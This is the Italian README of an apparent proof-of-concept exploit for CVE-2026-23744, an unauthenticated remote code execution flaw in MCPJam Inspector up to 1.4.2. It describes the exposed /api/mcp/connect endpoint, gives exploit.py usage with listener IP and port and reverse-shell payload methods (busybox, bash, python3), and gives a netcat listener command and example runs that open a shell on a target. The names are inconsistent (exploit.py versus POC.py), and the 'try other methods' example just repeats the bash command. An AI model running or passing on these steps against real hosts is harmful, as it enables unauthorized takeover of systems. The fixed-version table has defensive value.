
CVE-2026-23744 — Exploit proof of concept per una vulnerabilità di esecuzione remota di codice non autenticata in MCPJam Inspector <= 1.4.2.
MCPJam Inspector <= 1.4.2 si pone in ascolto su 0.0.0.0 per impostazione predefinita ed espone /api/mcp/connect senza alcuna autenticazione. L'endpoint accetta un oggetto serverConfig che avvia un processo direttamente sull'host — l'invio di un payload di reverse shell garantisce una RCE immediata senza richiedere credenziali.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| Flag | Descrizione | Predefinito |
|---|---|---|
-u | URL del target | obbligatorio |
-i | IP del tuo listener (LHOST) | obbligatorio |
-p | Porta del tuo listener (LPORT) | obbligatorio |
-m | Metodo del payload: busybox, bash, python3 | busybox |
Passaggio 1 — Avvia il tuo listener:
nc -lvnp 4444
Passaggio 2 — Esegui l'exploit:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
Se busybox non funziona sul target, prova gli altri metodi:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| Software | Vulnerabile | Corretta |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |